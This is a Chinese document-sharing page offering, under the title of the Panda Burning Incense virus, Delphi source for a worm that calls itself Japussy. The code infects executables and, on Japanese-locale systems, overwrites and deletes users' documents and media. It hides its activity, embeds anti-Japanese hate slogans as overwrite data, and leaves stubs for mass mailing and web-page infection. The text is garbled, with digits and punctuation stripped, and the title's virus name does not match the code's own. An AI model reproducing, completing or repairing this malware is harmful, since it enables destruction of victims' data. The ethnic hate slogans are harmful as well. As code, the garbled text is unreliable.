下载

1下载券

加入VIP
  • 专属下载特权
  • 现金文档折扣购买
  • VIP免费专区
  • 千万文档免费下载

上传资料

关闭

关闭

关闭

封号提示

内容

首页 熊猫烧香源代码免费下载

熊猫烧香源代码免费下载.doc

熊猫烧香源代码免费下载

三甲居士
2011-12-29 0人阅读 举报 0 0 暂无简介

简介:本文档为《熊猫烧香源代码免费下载doc》,可适用于IT/计算机领域

熊猫烧香源代码免费下载programJapussyusesWindows,SysUtils,Classes,Graphics,ShellAPI{,Registry}constHeaderSize=病毒体的大小IconOffset=EBPE文件主图标的偏移量在我的DelphiSP上面编译得到的大小其它版本的Delphi可能不同查找的十六进制字符串可以找到主图标的偏移量{HeaderSize=Upx压缩过病毒体的大小IconOffset=BCUpx压缩过PE文件主图标的偏移量UpxW用法:upxJapussyexe}IconSize=EPE文件主图标的大小字节IconTail=IconOffsetIconSizePE文件主图标的尾部ID=感染标记垃圾码以备写入Catchword='Ifaraceneedtobekilledout,itmustbeYamato''Ifacountryneedtobedestroyed,itmustbeJapan!''***WJapussyWormA***'{$R*RES}functionRegisterServiceProcess(dwProcessID,dwType:Integer):Integerstdcallexternal'Kerneldll'函数声明varTmpFile:stringSi:STARTUPINFOPi:PROCESSINFORMATIONIsJap:Boolean=False日文操作系统标记{判断是否为Winx}functionIsWinx:BooleanvarVer:TOSVersionInfobeginResult:=FalseVerdwOSVersionInfoSize:=SizeOf(TOSVersionInfo)ifnotGetVersionEx(Ver)thenExitif(VerdwPlatformID=VERPLATFORMWINWINDOWS)thenWinxResult:=Trueend{在流之间复制}procedureCopyStream(Src:TStreamsStartPos:IntegerDst:TStreamdStartPos:IntegerCount:Integer)varsCurPos,dCurPos:IntegerbeginsCurPos:=SrcPositiondCurPos:=DstPositionSrcSeek(sStartPos,)DstSeek(dStartPos,)DstCopyFrom(Src,Count)SrcSeek(sCurPos,)DstSeek(dCurPos,)end{将宿主文件从已感染的PE文件中分离出来以备使用}procedureExtractFile(FileName:string)varsStream,dStream:TFileStreambegintrysStream:=TFileStreamCreate(ParamStr(),fmOpenReadorfmShareDenyNone)trydStream:=TFileStreamCreate(FileName,fmCreate)trysStreamSeek(HeaderSize,)跳过头部的病毒部分dStreamCopyFrom(sStream,sStreamSizeHeaderSize)finallydStreamFreeendfinallysStreamFreeendexceptendend{填充STARTUPINFO结构}procedureFillStartupInfo(varSi:STARTUPINFOState:Word)beginSicb:=SizeOf(Si)SilpReserved:=nilSilpDesktop:=nilSilpTitle:=nilSidwFlags:=STARTFUSESHOWWINDOWSiwShowWindow:=StateSicbReserved:=SilpReserved:=nilend{发带毒邮件}procedureSendMailbegin哪位仁兄愿意完成之?end{感染PE文件}procedureInfectOneFile(FileName:string)varHdrStream,SrcStream:TFileStreamIcoStream,DstStream:TMemoryStreamiID:LongIntaIcon:TIconInfected,IsPE:Booleani:IntegerBuf:arrayofCharbegintry出错则文件正在被使用退出ifCompareText(FileName,'JAPUSSYEXE')=then是自己则不感染ExitInfected:=FalseIsPE:=FalseSrcStream:=TFileStreamCreate(FileName,fmOpenRead)tryfori:=todo检查PE文件头beginSrcStreamSeek(i,soFromBeginning)SrcStreamRead(Buf,)if(Buf=#)and(Buf=#)thenPE标记beginIsPE:=True是PE文件BreakendendSrcStreamSeek(,soFromEnd)检查感染标记SrcStreamRead(iID,)if(iID=ID)or(SrcStreamSize<)then太小的文件不感染Infected:=TruefinallySrcStreamFreeendifInfectedor(notIsPE)then如果感染过了或不是PE文件则退出ExitIcoStream:=TMemoryStreamCreateDstStream:=TMemoryStreamCreatetryaIcon:=TIconCreatetry得到被感染文件的主图标(字节)存入流aIconReleaseHandleaIconHandle:=ExtractIcon(HInstance,PChar(FileName),)aIconSaveToStream(IcoStream)finallyaIconFreeendSrcStream:=TFileStreamCreate(FileName,fmOpenRead)头文件HdrStream:=TFileStreamCreate(ParamStr(),fmOpenReadorfmShareDenyNone)try写入病毒体主图标之前的数据CopyStream(HdrStream,,DstStream,,IconOffset)写入目前程序的主图标CopyStream(IcoStream,,DstStream,IconOffset,IconSize)写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream,IconTail,DstStream,IconTail,HeaderSizeIconTail)写入宿主程序CopyStream(SrcStream,,DstStream,HeaderSize,SrcStreamSize)写入已感染的标记DstStreamSeek(,)iID:=DstStreamWrite(iID,)finallyHdrStreamFreeendfinallySrcStreamFreeIcoStreamFreeDstStreamSaveToFile(FileName)替换宿主文件DstStreamFreeendexceptendend{将目标文件写入垃圾码后删除}procedureSmashFile(FileName:string)varFileHandle:Integeri,Size,Mass,Max,Len:IntegerbegintrySetFileAttributes(PChar(FileName),)去掉只读属性FileHandle:=FileOpen(FileName,fmOpenWrite)打开文件trySize:=GetFileSize(FileHandle,nil)文件大小i:=RandomizeMax:=Random()写入垃圾码的随机次数ifMax<thenMax:=Mass:=SizedivMax每个间隔块的大小Len:=Length(Catchword)whilei<MaxdobeginFileSeek(FileHandle,i*Mass,)定位写入垃圾码将文件彻底破坏掉FileWrite(FileHandle,Catchword,Len)Inc(i)endfinallyFileClose(FileHandle)关闭文件endDeleteFile(PChar(FileName))删除之exceptendend{获得可写的驱动器列表}functionGetDrives:stringvarDiskType:WordD:CharStr:stringi:Integerbeginfori:=todo遍历个字母beginD:=Chr(i)Str:=D':'DiskType:=GetDriveType(PChar(Str))得到本地磁盘和网络盘if(DiskType=DRIVEFIXED)or(DiskType=DRIVEREMOTE)thenResult:=ResultDendend{遍历目录感染和摧毁文件}procedureLoopFiles(Path,Mask:string)vari,Count:IntegerFn,Ext:stringSubDir:TStringsSearchRec:TSearchRecMsg:TMsgfunctionIsValidDir(SearchRec:TSearchRec):Integerbeginif(SearchRecAttr<>)and(SearchRecName<>'')and(SearchRecName<>'')thenResult:=不是目录elseif(SearchRecAttr=)and(SearchRecName<>'')and(SearchRecName<>'')thenResult:=不是根目录elseResult:=是根目录endbeginif(FindFirst(PathMask,faAnyFile,SearchRec)=)thenbeginrepeatPeekMessage(Msg,,,,PMREMOVE)调整消息队列避免引起怀疑ifIsValidDir(SearchRec)=thenbeginFn:=PathSearchRecNameExt:=UpperCase(ExtractFileExt(Fn))if(Ext='EXE')or(Ext='SCR')thenbeginInfectOneFile(Fn)感染可执行文件endelseif(Ext='HTM')or(Ext='HTML')or(Ext='ASP')thenbegin感染HTML和ASP文件将Base编码后的病毒写入感染浏览此网页的所有用户哪位大兄弟愿意完成之?endelseifExt='WAB'thenOutlook地址簿文件begin获取Outlook邮件地址endelseifExt='ADC'thenFoxmail地址自动完成文件begin获取Foxmail邮件地址endelseifExt='IND'thenFoxmail地址簿文件begin获取Foxmail邮件地址endelsebeginifIsJapthen是倭文操作系统beginif(Ext='DOC')or(Ext='XLS')or(Ext='MDB')or(Ext='MP')or(Ext='RM')or(Ext='RA')or(Ext='WMA')or(Ext='ZIP')or(Ext='RAR')or(Ext='MPEG')or(Ext='ASF')or(Ext='JPG')or(Ext='JPEG')or(Ext='GIF')or(Ext='SWF')or(Ext='PDF')or(Ext='CHM')or(Ext='AVI')thenSmashFile(Fn)摧毁文件endendend感染或删除一个文件后睡眠毫秒避免CPU占用率过高引起怀疑Sleep()until(FindNext(SearchRec)<>)endFindClose(SearchRec)SubDir:=TStringListCreateif(FindFirst(Path'**',faDirectory,SearchRec)=)thenbeginrepeatifIsValidDir(SearchRec)=thenSubDirAdd(SearchRecName)until(FindNext(SearchRec)<>)endFindClose(SearchRec)Count:=SubDirCountfori:=toCountdoLoopFiles(PathSubDirStrings'',Mask)FreeAndNil(SubDir)end{遍历磁盘上所有的文件}procedureInfectFilesvarDriverList:stringi,Len:IntegerbeginifGetACP=then日文操作系统IsJap:=True去死吧!DriverList:=GetDrives得到可写的磁盘列表Len:=Length(DriverList)whileTruedo死循环beginfori:=Lendowntodo遍历每个磁盘驱动器LoopFiles(DriverList':','**')感染之SendMail发带毒邮件Sleep(**)睡眠分钟endend{主程序开始}beginifIsWinxthen是WinxRegisterServiceProcess(GetCurrentProcessID,)注册为服务进程elseWinNTbegin远程线程映射到Explorer进程哪位兄台愿意完成之?end如果是原始病毒体自己ifCompareText(ExtractFileName(ParamStr()),'Japussyexe')=thenInfectFiles感染和发邮件else已寄生于宿主程序上了开始工作beginTmpFile:=ParamStr()创建临时文件Delete(TmpFile,Length(TmpFile),)TmpFile:=TmpFile#'exe'真正的宿主文件多一个空格ExtractFile(TmpFile)分离之FillStartupInfo(Si,SWSHOWDEFAULT)CreateProcess(PChar(TmpFile),PChar(TmpFile),nil,nil,True,,nil,'',Si,Pi)创建新进程运行之InfectFiles感染和发邮件endend

用户评价(0)

关闭

新课改视野下建构高中语文教学实验成果报告(32KB)

抱歉,积分不足下载失败,请稍后再试!

提示

试读已结束,如需要继续阅读或者下载,敬请购买!

文档小程序码

使用微信“扫一扫”扫码寻找文档

1

打开微信

2

扫描小程序码

3

发布寻找信息

4

等待寻找结果

我知道了
评分:

/8

熊猫烧香源代码免费下载

VIP

在线
客服

免费
邮箱

爱问共享资料服务号

扫描关注领取更多福利